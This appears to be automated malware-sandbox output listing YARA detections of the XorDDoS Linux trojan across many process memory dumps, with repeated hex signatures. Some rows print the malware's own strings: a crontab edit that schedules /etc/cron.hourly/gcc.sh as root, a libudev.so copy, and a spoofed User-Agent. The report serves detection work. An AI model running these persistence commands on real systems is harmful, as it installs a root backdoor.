6537.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6537.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6537.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6537.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6412.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6412.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6412.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6412.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6412.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6412.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6412.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6330.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6330.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6330.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6330.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6330.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6330.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6330.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6279.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6279.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6279.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6279.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6279.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6279.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6279.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6271.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6271.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6271.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6271.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6271.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6271.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6271.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6545.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6545.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6545.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6545.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6545.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6545.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6545.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6528.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6528.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6528.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6528.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6528.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6528.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6528.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6518.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6518.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6518.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6518.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6518.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6518.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6518.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6401.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6401.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6401.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6401.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6401.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6401.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6401.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6540.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6540.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6540.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6540.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6540.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6540.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6540.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6372.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6372.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6372.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6372.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6372.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6372.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6372.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6276.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6276.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6276.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6276.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6276.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6276.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6276.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6469.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6469.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6469.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6469.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6469.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6469.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6469.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6511.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6511.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6511.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6511.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6511.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6511.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6511.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6523.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6523.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6523.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
